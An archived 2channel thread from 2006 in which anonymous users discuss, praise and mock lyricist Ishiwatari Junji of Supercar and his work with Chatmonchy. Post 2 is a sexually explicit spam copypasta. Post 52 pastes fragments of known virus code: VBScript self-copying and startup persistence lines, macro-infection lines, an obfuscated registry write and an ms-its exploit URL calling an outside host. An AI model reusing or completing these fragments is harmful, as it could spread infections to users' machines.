2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

いしわたり淳治(ex.スーパーカー)

1 :伝説の名無しさん:2006/06/26(月) 00:25:29
元スーパーカーの作詞・ギター、いしわたり淳治の活動を語るスレ。

いしわたり淳治公式ブログ キホンザベーシック
ttp://blog.eplus.co.jp/kihon/

2 :伝説の名無しさん:2006/06/26(月) 00:26:34
この前ズリダチとタイマン勝負したことを書くぜ。
互いに六尺姿でまずは威嚇、腕組みヤニ咥えガン飛ばし、
大股で筋肉と勃起誇張して、野郎比べだ。
雄臭ぇポーズで挑発しあう。腰突き出し勃起を振り回し、
オラオラ節で興奮に火が付く。

やわらオイルをタップリ仕込んで、いよいよズリ戦開始だ。
胴ズリ、逆ズリ、雁ズリ、玉ズリ、上ズリ、下ズリ。
野郎うなぎ責め、腰砕けの手マンコ、野郎泣かせの亀頭責め。
片手技と両手技の競り合いで、雄の粋と艶を比べ合う。
ズリ見せ根性丸出しでな。

一息入れる時にゃ、奴の胸板めがけて、勃起ションベン。

ビシバシ痛ぇくらいに、照射すりゃ、雄の制服感が全身を
快感となって駆け回る。

さらにオイルを仕込んで2R。
今度は俺のズリビデオ見せながらのダブルズリ攻撃さ。
ラッシュ飛ばして、ド淫乱野郎に変獣し、チンポ・センズリ・押忍の連呼。
俺達はまさに、チンポ、ズリ、男意気を激しく比べ合う戦闘士だ。

寸止めのエロい表情も相手を落とす神技、何度も食らう度に金玉の
引きつる痛みさえ新たな快感に変わる。

その時、ほんの少しの気の緩みで奴は快感のコントロールを失い
射精の痙攣に突入。

2回に渡るファイトはいずれも俺の勝利、最後は奴のチンポめがけて、
野郎制服の快感に酔いながら勝利の照射!
3時間勝負は俺達ズリ舎弟の絆を更に固めたぜ!

3 :伝説の名無しさん:2006/06/26(月) 00:44:45
フルカワミキさんに言いがかりをつけてはいけないと思う。

>>451 名前:伝説の名無しさん 投稿日:2006/06/26(月) 00:07:06
>>ジュンジの詞に影響うけたなら、なぜジュンジの詞をどうでもいいと言えたんだ?
>>八方美人すぎる。
>>ミキ昔雑誌で『薄っぺらい人ほど厳しい時代っていうか、芯とか深さがないと続けていくことは厳しい』っていってたけど、あんたに芯とかあんの?
>>真似っこや、甘ったれしてるやつにこんな事言う資格ないと思うんですけど。
>>発言には責任もってください

だからどうした?
これ書いた人は妄想気味ということにしておこう。

4 :伝説の名無しさん:2006/06/26(月) 01:30:38
ここまではっきり排除を見せ付けられるとね…悲しいね

5 :伝説の名無しさん:2006/06/26(月) 01:33:30
「なんでこの人たちはおれの人生から退場してくれないんだろう?」

おまえがその場を去ればよかっただけ >> いしわたり先生

6 :伝説の名無しさん:2006/06/26(月) 19:03:44
ここはジュンジ先生のアンチスレですか^^

7 :伝説の名無しさん:2006/06/26(月) 19:50:35
いいえ、いしわたり先生の素晴らしい詞の世界などを語るスレです。
古川の詞との比較などもどうぞ。

8 :伝説の名無しさん:2006/06/26(月) 20:07:40
いしわたり先生被害妄想語録

「アップルiPod陰謀史観」

>>たぶん、保障期間から考えて
>>iPodはその壊れるポイントが一年もつかもたないか、
>>ぐらいに設定してあるんだろう。
>>まったく。腹黒いにもほどがある。
>>これだから、アメリカ企業ってやつは…。
>>わびさびのない国だぜ。

てめえの使い方が悪くて壊してるだけだろ、テラワロスwwwwwwwwwwうぇ

9 :伝説の名無しさん:2006/06/26(月) 21:22:19
ジュンジ、ノッポン元気?

10 :伝説の名無しさん:2006/06/26(月) 22:38:02
いざ!☆

11 :伝説の名無しさん:2006/06/27(火) 02:21:02
安心を買った、いざ!

12 :伝説の名無しさん:2006/06/27(火) 02:22:47
名曲がいまも、いざ!☆

13 :伝説の名無しさん:2006/06/27(火) 07:01:53
伝えたい感情には、いざ!☆ 笑えない背景が

14 :伝説の名無しさん:2006/06/27(火) 13:15:20
彼女って誰?

15 :伝説の名無しさん:2006/06/27(火) 20:52:56
ジュンジかわいいよ

16 :伝説の名無しさん:2006/06/27(火) 21:30:07
わんだーわんだーいざ!☆

17 :伝説の名無しさん:2006/06/27(火) 21:36:58
戸川純

18 :伝説の名無しさん:2006/06/27(火) 22:13:48
>>17
いいえ、石渡淳治です。

19 :伝説の名無しさん:2006/06/27(火) 22:25:52
柴田淳

20 :伝説の名無しさん:2006/06/27(火) 23:16:12
僕にもターバン巻き方教えて

21 :伝説の名無しさん:2006/06/27(火) 23:22:59
隣の印度人ハケーン!

22 :伝説の名無しさん:2006/06/27(火) 23:35:37
いしわたり先生被害妄想語録

「十万円の料理はそんなに美味くない」

>>十万円の料理は十万円の味を求められる。
>>でも十万円の味がわかる舌を持っている客なんてほとんどいない。
>>だから十万円の料理は「別にそんなに・・・」と常に言われ続ける。

なことはない。てめぇの舌が鈍感なだけだろ、テラワロスwwwwwwwwwwうぇ

23 :伝説の名無しさん:2006/06/28(水) 01:22:28
?うん…?

24 :伝説の名無しさん:2006/06/28(水) 08:14:14
>>22
うまい文章

25 :伝説の名無しさん:2006/06/28(水) 09:48:34
ジュンジのどこが嫌いなの?

非の打ち所がない秀才じゃん。

否定する人ってすごいね

26 :伝説の名無しさん:2006/06/28(水) 17:24:40
そんなんじゃ釣れません

27 :伝説の名無しさん:2006/06/28(水) 20:09:56
ひねくれた田舎青年

28 :伝説の名無しさん:2006/06/28(水) 20:18:26
エレクトロニカ路線に転じた時点で脱退してれば今の惨状はなかった

29 :伝説の名無しさん:2006/06/28(水) 22:21:17
淳治はギターロックがしたかったんだろ?
じゃあなんでストロボライツみたいなのを作るのを了承したんだ?
いやだったんだろ?

なんで?

30 :伝説の名無しさん:2006/06/28(水) 22:29:11
ナカコーのことが好きだったからだよ

31 :伝説の名無しさん:2006/06/28(水) 23:07:32
ジュンジ×ナカコー

32 :伝説の名無しさん:2006/06/28(水) 23:08:40
重複
いしわたり淳治(from SUPERCAR)
http://book3.2ch.net/test/read.cgi/poem/1078661882/

33 :伝説の名無しさん:2006/06/29(木) 02:04:57
それ、ポエム板じゃんよwwwwwwwwwwwwwwwwwwwww

34 :伝説の名無しさん:2006/06/29(木) 02:24:10
こいつ言うばっかり
新しくてカッコいいロックがチャットなんたらって

ミキの幻追いかけてるだけじゃないかw

35 :伝説の名無しさん:2006/06/29(木) 03:17:31
ミキのスレではファン以外の書き込みを必死で排斥してるみたいだけど
ここはそうでもないね。自由な発言が出来て結構な事です

36 :伝説の名無しさん:2006/06/29(木) 09:08:14
ジュンジはミキのこと、一バンドの一要員として必要と
していたんだと思うな。
ストロボライツなんて、ミキに唄わせること意識しなければ
書けないでしょ。

ナカコーと愛の逃避行に出てしまったものだから、
ジュンジはチャットモで逃避行してしまっているね。

37 :伝説の名無しさん:2006/06/29(木) 14:34:10
ジュンジにはスーパーカーが必要
スーパーカーにはナカコーが必要
ナカコーにはミキが必要

結果、ジュンジはミキの事を飼わざるを得なかった、と。

38 :伝説の名無しさん:2006/06/29(木) 16:13:42
このスレが建つんだから、頑張ってくださいよ。
ズンジ先生!

39 :伝説の名無しさん:2006/06/29(木) 16:41:04
>>36
あの曲はナカコーがミキに歌わせる前提で作ったんじゃなかったっけ?

40 :伝説の名無しさん:2006/06/29(木) 16:57:02
>>39
どう考えてもそうだろ

41 :伝説の名無しさん:2006/06/29(木) 18:51:50
ナカコーがストロボライツ歌ってたらキモいな

42 :伝説の名無しさん:2006/06/29(木) 19:30:03
ナカコーとミキは歌詞が必要ないって考えたけど、
"歌う"為には歌詞が必要じゃん。
"ミキに歌わせる前提"っておかしくないか?

43 :伝説の名無しさん:2006/06/29(木) 22:14:48
まぁまぁ。>>36はちょっと日本語が苦手なんでしょ

44 :伝説の名無しさん:2006/06/30(金) 00:35:27
例えば「らららー♪」だけでもいいんだ、意味深な歌詞は要らない

45 :伝説の名無しさん:2006/06/30(金) 08:57:58
>>44
「らららー」だけで名曲を作れると思ってるんだから凄い自信だよな

46 :伝説の名無しさん:2006/06/30(金) 10:43:01
>>42
女性ボーカル向きの音ではあるな。ピコピコ。

47 :伝説の名無しさん:2006/06/30(金) 21:34:07
ジュンジ先生を応援しています^^

48 :伝説の名無しさん:2006/06/30(金) 21:35:25
ジュンジ先生、スエミツも好調ですね(^ω^)

49 :伝説の名無しさん:2006/06/30(金) 21:42:24
ジュンジ先生、中くんいいですね^^

50 :伝説の名無しさん:2006/06/30(金) 22:28:05
こいつギター上手くないよな
ナカコーのうほうがいけてる

51 :伝説の名無しさん:2006/07/01(土) 00:00:38
くるりオヌヌメ

52 :伝説の名無しさん:2006/07/01(土) 14:01:10
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???


53 :伝説の名無しさん:2006/07/01(土) 14:02:45
>>52
なぁ、こういうことすんなよ。非常識だぞ。

54 :伝説の名無しさん:2006/07/02(日) 08:01:59
ロックやれよロック
フカシこいてるだけのひねくれものめ

55 :伝説の名無しさん:2006/07/02(日) 10:08:29
「フカシこいてる」w

56 :伝説の名無しさん:2006/07/02(日) 20:18:19
伊藤はるな=ジュンジ

57 :伝説の名無しさん:2006/07/02(日) 21:45:40
ジュンジ様とそんな奴を一緒にしないで下さい><

58 :伝説の名無しさん:2006/07/03(月) 01:58:22
「フカシこいてる」って久々に聞いたわ。いやぁ日本は広いね

59 :伝説の名無しさん:2006/07/03(月) 20:29:01
ジョンジは降臨しないの?

60 :伝説の名無しさん:2006/07/03(月) 20:55:43
コーダイがスパカスレに降臨したからジュンジさんも頼む!

61 :伝説の名無しさん:2006/07/03(月) 21:34:46
ジュンジ世界で一番愛してるよ
だから出て来てよ

62 :伝説の名無しさん:2006/07/03(月) 21:46:11
>>52は多分おふざけではないと思う。
張る板間違えたんじゃないの?

ぷろぐらまやらSEの集まる板に張りたかったんじゃないのかこれは

63 :伝説の名無しさん:2006/07/04(火) 00:34:47
ジュンジ先生降臨してください!!!!!!!!!!!

64 :伝説の名無しさん:2006/07/04(火) 01:16:02
あーあ、ジュンジさんこないかなー

65 :伝説の名無しさん:2006/07/04(火) 23:35:54
ジュンジくん!

66 :伝説の名無しさん:2006/07/05(水) 07:48:54
もうやめようぜ
どこのスレでも降臨、降臨言ってたら折角来てくれたコウダイが責任感じるだろ
ましてや淳治さんは降臨してと言われて書き込んだりしない(気がする)し・・・

大人にナロウゼ

67 :伝説の名無しさん:2006/07/05(水) 11:51:17
チャットモのアルバム聴いたよ。こういうバンドサウンドが聴きたかったんだよ。ありがとう!ジャケのデザインとアルバムタイトルはダサイよ。

68 :伝説の名無しさん:2006/07/05(水) 11:57:06
チャットモのアルバム聴いたよ。こういうバンドサウンドが聴きたかったんだよ。ありがとう!
ジャケのデザインとアルバムタイトルはダサイから、次回作は頼むぞ。

69 :超鳥 ◆EafmCoLzWA :2006/07/05(水) 16:06:43
B-DASHのNEW HORIZONが好きなんだがジュンジ作詞なのね。
これくらいしかB-DASHの曲知らないんだがこの曲は忘れないわきっと

70 :伝説の名無しさん:2006/07/06(木) 19:43:12
ずんじあげ

71 :伝説の名無しさん:2006/07/06(木) 20:05:00
>>67-68
ジャケのデザインださいって、あれ、リトルバーリーのまんまパクリやん。

72 :伝説の名無しさん:2006/07/07(金) 21:31:34
バンド名がださい>>>チャットモンチー
いらんもてんしらん

73 :伝説の名無しさん:2006/07/08(土) 10:56:18
チャットモンチー5年後に残ってる音じゃないな。
いしわたりくんなんとかしたまえ。

74 :伝説の名無しさん:2006/07/08(土) 21:15:52
歌詞じゃなく音楽面での停滞だから
ナカコーならなんとか出来ると思う


75 :伝説の名無しさん:2006/07/08(土) 22:48:35
モンチーってどー言う意味なの?モンキーのほうが可愛いのに!

76 :伝説の名無しさん:2006/07/09(日) 05:01:10
歌詞は元から好きじゃない
音も今回のアルバムで底が見えた

もう駄目だチャットモンチーは

77 :伝説の名無しさん:2006/07/09(日) 23:38:19
やっぱダメだよな。モンチーw

78 :伝説の名無しさん:2006/07/10(月) 00:08:59
ジュンジが、チャットモンチーのメンバーに命じた言葉。

「フルカワミキのアルバムには勝て!」

79 :伝説の名無しさん:2006/07/10(月) 21:12:38
ジュンジ先生はイケメンですか?

80 :伝説の名無しさん:2006/07/10(月) 21:43:37
いやぜんぜん
ナカコーのほうがかっこいい

81 :伝説の名無しさん:2006/07/10(月) 22:03:55
ジュンジ先生はANSWERの時はかっこいいよ

ドライヴ聴いたとき「こんな男っぽい人がこんな女々しい詞を…」と思った記憶がある

82 :伝説の名無しさん:2006/07/10(月) 23:06:36
ジュンジくんは本当にかっこいいよ!

83 :伝説の名無しさん:2006/07/10(月) 23:59:44
ttp://ent2.excite.co.jp/music/interview/2004/supercar/
みんなかっこいいお(ミキ除く

84 :伝説の名無しさん:2006/07/11(火) 02:03:15
>>83
男衆カッコエエ('A`*)

85 :伝説の名無しさん:2006/07/12(水) 23:42:33
kya!

86 :伝説の名無しさん:2006/07/13(木) 12:14:09
ズンジ、チャットモ週間10位おめでとう。

87 :伝説の名無しさん:2006/07/13(木) 21:39:34
ミキちゃんてナカコーと付き合ってたの?ジュンジくんとはなんもなし?

88 :伝説の名無しさん:2006/07/13(木) 23:24:42
ジュンジくんは自虐的性格だからわざとミキに触れずにいて
ナカコーといちゃついてる姿を横目で見つつあれこれ歌詞のネタ考えてた。

89 :伝説の名無しさん:2006/07/13(木) 23:29:18
>>83 4ページのコーダイの後ろ3人ワロタw

90 :伝説の名無しさん:2006/07/14(金) 00:52:52
>>89
ジュンジの視線が冷たいなw

91 :伝説の名無しさん:2006/07/14(金) 02:11:07
>>87 セフレ

92 :伝説の名無しさん:2006/07/14(金) 18:58:10
ジュンジくん自虐的なのか… ひょっとしてMなの!?

93 :伝説の名無しさん:2006/07/15(土) 18:13:07

いし
いしわ
いしわた
いしわたり
いしわたりじ
いしわたりじゅ
いしわたりじゅん
いしわたりじゅんじ


94 :伝説の名無しさん:2006/07/15(土) 20:18:17
じゅんじ、この夏は徳島行って阿波踊り踊ってこい。
盆踊りなんだから青森の先祖思いつつな。

95 :伝説の名無しさん:2006/07/17(月) 14:52:23
黒いカバンを ぶら下げて 歩いていると
お巡りさんに 呼び止められた
「おーいちょっと」と彼は言うのだった
「おいちょっと」という挨拶をくれたことが無かったので
ムカッときたのです
すると お巡りは「そのカバンを見せて貰いたい」と言って
さも それが当然のような顔をした
見せたくなければ見せない これは当然なのであるから
「見せたくないですね」と言うと 「おまえは誰だ?」と言うので
「僕は人間ですよ」と答えたのです
すると「おまえは!」と大きな声で言うので
「あなたのお名前は?」と尋ねると 「それは言えない」と言う
「それは変ですね? 人は会ったなら ましてそれが初対面なら
  お互いに名乗るのが最低の礼儀でしょう」と言うと
お巡りは「盾たてつくのか!」と言うので 「礼儀知らず!」と言うと
「なにィ!」と怒ったが 思い直したように 彼は
「まあ今度だけは許してやる」などと言ったので
そこで僕も「今度だけは許してやる」と言ってやった


96 :伝説の名無しさん:2006/07/17(月) 23:04:41
ジュンジの発言?
イタwwwwww

97 :伝説の名無しさん:2006/07/18(火) 20:51:57
>>96
「黒いカバン」
 作詞:岡本おさみ 作曲:泉谷しげる
 歌:泉谷しげる

98 :伝説の名無しさん:2006/07/19(水) 20:37:49
早見優
徳井優
山田優
蒼井優

99 :伝説の名無しさん:2006/07/20(木) 03:15:01
>>8
ワロスwww
これまじ?
まじならなかなかぶっ壊れた頭をお持ちだ
興味がわいた

100 :伝説の名無しさん:2006/07/20(木) 08:34:57
>>99
むしろそういう設定をしてるのはソニーとかだよね。

101 :伝説の名無しさん:2006/07/20(木) 11:10:52
山本逮捕でチーム神様と
試合できなくなってるのかな?

102 :伝説の名無しさん:2006/07/20(木) 11:14:41
彼女って誰?

103 :伝説の名無しさん:2006/07/21(金) 00:22:43
一番好きな歌はどれですか?自分はワンダーワードかな

104 :伝説の名無しさん:2006/07/21(金) 02:40:45
ラッキーですね。

105 :伝説の名無しさん:2006/07/22(土) 21:17:26
チャット猿聴いたけどカン高いヴォーカルが趣味ではなかった。
ミキちゃんのほうがいいよ、ジュンジ!

106 :伝説の名無しさん:2006/07/22(土) 21:22:26
>>105
いろいろなところで乙。

107 :伝説の名無しさん:2006/07/23(日) 19:24:33
恋愛スピリッツなんてどこがいいのやら

108 :伝説の名無しさん:2006/07/23(日) 21:17:55
>>107
そりゃ自由だがこんな所に書き込まれても

109 :伝説の名無しさん:2006/07/26(水) 00:06:34
ふん

110 :伝説の名無しさん:2006/07/26(水) 08:51:34
本スレは相変わらず狂人が一人で暴れてるなw
奴が張り付いてる時はこっちを暫定スパカスレにしてもいいかも

111 :伝説の名無しさん:2006/07/26(水) 09:43:57
ここが避難所という訳ですね

112 :伝説の名無しさん:2006/07/26(水) 10:11:55
>>110-111
勘弁してくれ。
ヨソのスレの問題を持ち込むな。

113 :伝説の名無しさん:2006/07/26(水) 10:56:12
あくまで避難所ならまぁいいんじゃない?
問題を持ち込むというより荒らしが嫌な人達が来るだけだし

それにしてもフジロックまであと少しだ
今更ながらスーパーカーが見たい…

114 :伝説の名無しさん:2006/07/27(木) 15:09:34
ここを避難所にしたら荒らしも一緒にくるだけ。

20 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)